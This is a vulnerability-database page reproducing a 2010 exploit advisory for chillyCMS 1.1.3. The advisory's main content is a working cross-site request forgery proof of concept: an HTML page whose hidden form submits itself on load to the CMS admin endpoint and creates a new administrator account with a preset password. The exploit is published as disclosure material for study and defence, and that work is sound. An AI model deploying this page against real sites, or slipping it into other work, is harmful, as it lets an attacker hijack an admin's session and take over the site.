Lucene search
K

chillyCMS 1.1.3 Cross Site Request Forgery

🗓️ 13 Jul 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

chllyCMS 1.1.3 Cross Site Request Forgery vulnerability allows creation of new admi

Code
`<!------------------------------------------------------------------------  
# Software................chillyCMS 1.1.3  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://chillycms.bplaced.net/chillyCMS/  
# Release Date............7/11/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://cross-site-scripting.blogspot.com/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in chillyCMS 1.1.3 can be  
# exploited to create a new admin.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/chillyCMS/admin/usersgroups.site.php">  
<input type="hidden" name="user" value="new_admin" />  
<input type="hidden" name="name" value="a" />  
<input type="hidden" name="pw" value="Password1" />  
<input type="hidden" name="pw2" value="Password1" />  
<input type="hidden" name="email" value="" />  
<input type="hidden" name="gids%5B%5D" value="1" />  
<input type="hidden" name="gids%5B%5D" value="3" />  
<input type="hidden" name="gids%5B%5D" value="4" />  
<input type="hidden" name="active" value="1" />  
<input type="hidden" name="language" value="en" />  
<input type="hidden" name="getnewsletter" value="1" />  
<input type="hidden" name="myaction" value="new" />  
<input type="hidden" name="action" value="updateuser" />  
<input type="hidden" name="id" value="" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation